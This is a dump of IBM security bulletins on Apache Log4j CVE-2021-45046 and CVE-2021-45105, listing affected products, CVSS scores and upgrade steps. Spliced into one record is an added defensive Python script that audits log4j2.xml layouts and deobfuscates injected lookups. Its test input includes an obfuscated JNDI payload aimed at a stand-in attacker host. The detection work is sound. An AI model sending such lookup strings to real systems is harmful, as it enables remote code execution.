"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T15:29:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Spectrum Scale for IBM Elastic Storage Server (CVE-2021-45105,CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-31T15:29:42", "id": "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "href": "https://www.ibm.com/support/pages/node/6537752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:07", "description": "## Summary\n\nMultiple Apache Log4j vulnerabilities impact Process Federation Server that is shipped with IBM Business Automation Workflow. The fix includes Apache Log4j v2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Business Automation Workflow| V21.0 \nV20.0 \nV19.0 \nV18.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the Interim Fix: \n\n[IBM Business Automation Workflow](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=aparId&apars=JR64435>)\n\nFor more information regarding APAR: [JR64435](<https://www.ibm.com/support/docview.wss?uid=swg1JR64435> \"JR64435\" ). 
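The bulletins above all repeat the same two preconditions for CVE-2021-45046 and CVE-2021-45105: a non-default PatternLayout that contains a Context Lookup (`${ctx:...}` or `$${ctx:...}`), and attacker-controlled Thread Context Map (MDC) data carrying lookup syntax. The following Python is an added example, not IBM's or Apache's code, that checks both: it flags risky layouts in a log4j2.xml and proposes the `%X{key}` converter rewrite Apache published as the mitigation, unwraps the nested `${::-j}` / `${lower:j}` obfuscation attackers use to hide a `${jndi:...}` string in MDC values, and lists which of the four Log4j CVEs a given log4j-core version still has. The sample config and the sample MDC values are constructed; the version table covers the Log4j 2 main line (Java 8+) only, and the 2.12.x and 2.3.x maintenance branches are flagged rather than assessed.

```python
"""Checks for the two preconditions named in the CVE-2021-45046 / CVE-2021-45105
bulletins above.  Added example; it is not IBM's or Apache's code.  Version
thresholds are for the Log4j 2 main line (Java 8+); the 2.12.x and 2.3.x
maintenance branches have their own fixed versions and are only flagged."""
import re
import xml.etree.ElementTree as ET

# Constructed sample log4j2.xml: the first appender uses the risky $${ctx:...}
# lookup from the bulletins; the second already uses the safe %X{...} converter.
SAMPLE_LOG4J2_XML = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p [$${ctx:loginId}] %c - %m%n"/>
    </Console>
    <File name="Audit" fileName="audit.log">
      <PatternLayout><Pattern>%d %X{loginId} %m%n</Pattern></PatternLayout>
    </File>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="Console"/></Root></Loggers>
</Configuration>"""

CTX_LOOKUP = re.compile(r"\$\$?\{ctx:([^}]+)\}")   # ${ctx:key} or $${ctx:key}
INNERMOST = re.compile(r"\$\{([^${}]*)\}")         # a lookup with nothing nested inside
JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)

def safe_rewrite(pattern: str) -> str:
    """Apache's mitigation for these CVEs: replace the Context Lookup with the
    %X{key} converter, which prints the MDC value without a second lookup pass."""
    return CTX_LOOKUP.sub(lambda m: "%X{" + m.group(1) + "}", pattern)

def find_context_lookups(xml_text: str) -> list[tuple[str, str]]:
    """Return (risky pattern, suggested rewrite) for every PatternLayout whose
    pattern attribute or <Pattern> child uses a ctx lookup."""
    findings = []
    for layout in ET.fromstring(xml_text).iter("PatternLayout"):
        pattern = layout.get("pattern")
        if pattern is None:
            child = layout.find("Pattern")
            pattern = child.text if child is not None else None
        if pattern and CTX_LOOKUP.search(pattern):
            findings.append((pattern, safe_rewrite(pattern)))
    return findings

def _resolve_innermost(m):
    body = m.group(1)
    if ":-" in body:                   # ${anything:-default} evaluates to "default"
        return body.split(":-", 1)[1]
    kind, _, value = body.partition(":")
    if kind.lower() == "lower":
        return value.lower()
    if kind.lower() == "upper":
        return value.upper()
    return m.group(0)                  # jndi, ctx, env, ...: leave for the caller to judge

def deobfuscate(value: str) -> str:
    """Collapse the default-value and case lookups attackers nest to hide a
    ${jndi:...} string, innermost first, until nothing more resolves."""
    prev = None
    while prev != value:
        prev, value = value, INNERMOST.sub(_resolve_innermost, value)
    return value

def classify_mdc_value(key: str, value: str) -> str:
    """Triage one MDC (Thread Context Map) value that came from untrusted input."""
    if "${" not in value:
        return "clean"
    resolved = deobfuscate(value)
    if JNDI.search(resolved):
        return "jndi lookup after deobfuscation: " + resolved
    if re.search(r"\$\$?\{ctx:" + re.escape(key) + r"\}", resolved, re.IGNORECASE):
        return "self-referential ctx lookup (CVE-2021-45105 recursion path)"
    return "lookup syntax present: " + resolved

FIXED_IN = {  # first main-line release that closes each CVE
    "CVE-2021-44228": (2, 15, 0),
    "CVE-2021-45046": (2, 16, 0),
    "CVE-2021-45105": (2, 17, 0),
    "CVE-2021-44832": (2, 17, 1),
}

def cves_open(log4j_core_version: str) -> list[str]:
    """List the CVEs still open in a log4j-core main-line version string."""
    parts = tuple(int(p) for p in log4j_core_version.split("-")[0].split("."))
    parts = (parts + (0, 0, 0))[:3]
    if parts[0] != 2:
        raise ValueError("only Log4j 2 is assessed here")
    if parts[:2] in ((2, 12), (2, 3)):
        return ["maintenance branch: use the branch-specific fixed versions"]
    return [cve for cve, fixed in FIXED_IN.items() if parts < fixed]

if __name__ == "__main__":
    for pattern, rewrite in find_context_lookups(SAMPLE_LOG4J2_XML):
        print("risky layout:", pattern, "->", rewrite)
    for v in ("alice", "${${::-j}${::-n}di:ldap://attacker.example/a}", "${${ctx:loginId}}"):
        print(repr(v), "=>", classify_mdc_value("loginId", v))
    print("2.16.0 still open:", cves_open("2.16.0"))
```

The layout check is the one that decides whether a host on 2.15.0 is actually exposed to CVE-2021-45046: with no `${ctx:...}` lookup in any PatternLayout the MDC path is closed, but the rewrite to `%X{key}` is cheap and removes the dependency on that judgement. The MDC triage is for request-path data (headers, usernames) before it is bound with ThreadContext.put; any lookup syntax in such data is hostile whether or not it resolves to `jndi:`.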
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T07:04:20", "type": "ibm", "title": "Security Bulletin: IBM Business Automation Workflow is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T07:04:20", "id": "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "href": "https://www.ibm.com/support/pages/node/6540542", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:35:24", "description": "## Summary\n\nIBM Maximo Application Suite - Monitor Component uses Apache Log4j which is vulnerable to CVE-2021-45105 and CVE-2021-45046.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo Application Suite - Monitor Component| 8.6.0-8.6.2, 8.7.0 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Fixpack Version(s) \n---|--- \nIBM Maximo Application Suite - Monitor Component| 8.6.3 or latest (available from the Catalog under Update Available) \nIBM Maximo Application Suite - Monitor Component| 8.7.1 or latest (available from the Catalog under Update Available) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-05-08T20:27:38", "type": "ibm", "title": "Security Bulletin: Apache Log4j is vulnerable to CVE-2021-45105 and CVE-2021-45046 used in IBM Maximo Application Suite - Monitor Component", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2023-05-08T20:27:38", "id": "F122C27179362A817F8CF31FDC2906DEDD7B8BBEA33D06FFA42180F0625D22E0", "href": "https://www.ibm.com/support/pages/node/6988975", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:07", "description": "## Summary\n\nThere are vulnerabilities in the Apache Log4j open source library. The library is used by IBM CloudPak foundational services which is a dependency of IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps. The fix includes upgrade to Apache Log4j v2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM WebSphere Automation for IBM Cloud Pak for Watson AIOps| 1.2 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now. The recommended solution involves a component of IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps. The name of the component is IBM CloudPak foundational services (Events Operator). It is recommended to follow the instructions below. \n\nUpgrade to the latest IBM Cloud Pak foundational services release from the IBM Catalog. \n\n**Installing the IBM Cloud Pak foundational services online** \nRefer to the following documentation to perform an online installation:\n\n * [Installing IBM Cloud Pak foundational services online by using the console](<https://www.ibm.com/docs/en/cpfs?topic=314-installing-foundational-services-by-using-console>)\n * [Installing IBM Cloud Pak foundational services online by using the CLI](<https://www.ibm.com/docs/en/cpfs?topic=314-installing-foundational-services-by-using-cli>)\n\nIf the Approval Strategy is set to Automatic in the subscription, the operator will automatically update to the latest version. \nIf the Approval Strategy is set to Manual in the subscription, IBM Cloud Pak foundational services operator cannot be automatically installed or upgraded. For more information, see [Approval strategy](<https://www.ibm.com/docs/en/cpfs?topic=services-configuring-foundational-by-using-custom-resource#approval_strategy>). Update to the latest version. 
\n \n\n\n**Installing the IBM Cloud Pak foundational services in an air-gapped environment** \nRefer to the following documentation to perform an air-gapped installation:\n\n * [Installing in an air gap environment](<https://www.ibm.com/docs/en/ws-automation?topic=installing-in-air-gap-environment> \"Installing in an air gap environment\" )\n * Ensure that the following environment variable is used when downloading CASE files: \nexport CASE_VERSION=1.2.1\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T13:59:33", "type": "ibm", "title": "Security Bulletin: Due to Apache Log4j, IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps is vulnerable to arbitrary code execution (CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T13:59:33", "id": "09E2EB771A00246F88812FA7239EC135B4D760017A61975C9C7DFACAB2B566B3", "href": "https://www.ibm.com/support/pages/node/6540584", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:27", "description": "## Summary\n\nThere are vulnerabilities in the version of Apache Log4j that is used by IBM Data Virtualization on Cloud Pak for Data (CVE-2021-45046 and CVE-2021-45105) which is used for logging. The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **DV Version(s) \n**| \n\n**CPD ****Version(s) ** \n \n---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9 \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.3| 4.0 Refresh 4 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Affected Product(s)**| **DV Version(s) **| **CPD Version(s) **| **Fixes** \n---|---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9\n\n| \n\nApply patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3| \n\nUpdate to version 1.7.5 (DV) /\n\n4.0 Refresh 5 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.3| 4.0 Refresh 4| \n\nUpdate to version 1.7.5 (DV) /\n\n4.0 Refresh 5 (CPD) \n \n**You must update the Cloud Pak for Data platform to version 4.0 Refresh 5 to install the fix for Data Virtualization.**\n\nTo update Cloud Pak for Data platform to 4.0 Refresh 5, see the following links:\n\n * [Updating Data Virtualization from Version 3.5](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v35.html> \"Updating Data Virtualization from Version 3.5\" )\n * [Updating Data Virtualization 
from Version 4.0.1 or later](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v4.html>)\n\n**The following procedure covers the steps after installing the fix for Data Virtualization**.\n\n 1. Run the following steps from the Data Virtualization head pod to manually remove unnecessary files from your updated Data Virtualization instance. These include files that contained old log4j binaries. Not all of the files might be present if you previously installed other log4j fixes. \n\n 1. Log in to the Data Virtualization head pod. \n \n oc rsh c-db2u-dv-db2u-0\n\n 2. Switch to the db2inst1 user. \n \n su - db2inst1\n\n 3. Remove unnecessary JAR files. \n \n rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.15.0.jar\"\n \n ${BIGSQL_CLI_DIR}/BIGSQL/package/scripts/bigsqlPexec.sh -w -c \"rm -rf 
/mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.15.0.jar\"\n\n 4. Remove unnecessary ZIP and TAR files. \n \n rm -rf /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7*.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config/DATAVIRTUALIZATION_ENDPOINT_V1.7*.zip\n\n 5. Copy the latest TAR file. \n \n cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.5_*.tar.gz /mnt/PV/versioned/uc_dsserver_shared/config\n\n 6. Copy the latest ZIP file. \n \n cp /opt/ibm/qp_artifacts/archives/DATAVIRTUALIZATION_ENDPOINT_V1.7.5_*.zip /mnt/PV/versioned/uc_dsserver_shared/config\n\n 2. Complete the following steps to manually restart head and worker pods to complete applying the fix. This manual restart can be performed by running the following command: \n\n 1. Wait for the Data Virtualization hurricane pod to start up successfully.\n 2. Run the following commands to restart the Data Virtualization head and worker pods: \n \n current_replicas=$(oc get sts c-db2u-dv-db2u -o jsonpath=\"{.spec.replicas}\"); oc scale sts c-db2u-dv-db2u --replicas=0; sleep 3m; oc scale sts c-db2u-dv-db2u --replicas=$current_replicas\n\n 3. If you see the following error message, restart the Data Virtualization hurricane pod and then repeat step 2. b) \n \n ERR api/pkg/cli/sideload/load.go:73 error=\"file is the wrong size: 154274816, expected: 154143232\\n\"\n\n 3. Data Virtualization is now ready to use.\n\n**Note**_:_\n\n_If you run a security vulnerability scanning tool on the Docker images, you might find that some of the affected packages at the affected version are still present on it. 
_\n\n_Those packages have been modified according to guidance provided by the Apache Log4j development team so that they are no longer vulnerable._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-29T00:31:33", "type": "ibm", "title": "Security Bulletin: IBM Data Virtualization on Cloud Pak for Data is vulnerable to arbitrary code execution (CVE-2021-45046) and denial of service (CVE-2021-45105) due to Apache Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-29T00:31:33", "id": "185EAAB4DDC8472DF44603A1F8F5361C61E9CD92D640BE3D1EC6D31AE959C4F0", "href": "https://www.ibm.com/support/pages/node/6551744", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:25", "description": "## Summary\n\nIBM Sterling Configure, Price, Quote uses Apache Log4j (CVE-2021-45105 and CVE-2021-45046) to log messages. 
The fix includes Apache Log4j v2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- 